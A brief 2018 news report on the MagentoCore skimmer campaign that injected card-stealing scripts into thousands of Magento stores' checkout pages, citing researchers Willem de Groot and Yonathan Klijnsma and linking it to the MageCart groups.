MagentoCore Malware has recently infected over 7000 Magento-based stores, raising a concern of leaking payment card data of shoppers on the sites.
According to a Dutch researcher, there is a script that steals payment card data called “payment card scraper” or “skimmer”. Hackers breach sites and modify their source code to load the script. Mostly the hacking process is done on checkout pages where the script collects payment card details and then send them to a server controlled by the hackers.
MagentoCore —the most aggressive skimmer
Willem de Groot, a famous Dutch security expert has found that the skimmer script is loaded from the magentocore.net domain, which he described in his blog as “the most successful to date”.
He also added that though it just takes a few weeks for a site to recover, at least 1450 stores have suffered from MagentoCore.net for the past 6 months. About 50 to 60 stores are being attacked per day.
Who is targeted? “The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit,” de Groot said. “But the real victims are eventually the customers, who have their card and identity stolen.” He added.
Magecart- a malicious infrastructure for stealing payment data
According to Yonathan Klijnsma, Threat Researcher Lead for RiskIQ, the massive website hacking campaign de Groot reported roots from a larger card scraping campaign called MageCart.
MagentoCore Malware and associated magento.net domain are one of the three MageCart groups. De Groot said that he discovered the MagentoCore campaign while tracking stores for Malware infections. He also added that the malicious scripts are infecting at least 4.2% of all active Magento stores.
4.2% of all Magento stores globally are currently leaking payment and customer data pic.twitter.com/Utw9W3t3Oa
— Willem de Groot (@gwillem) August 27, 2018
De Groot offers help for online merchants. As long as they are willing to donate their domains, he can set up honeypots and scanning malware attacks and other types of cyber-attacks on the sites.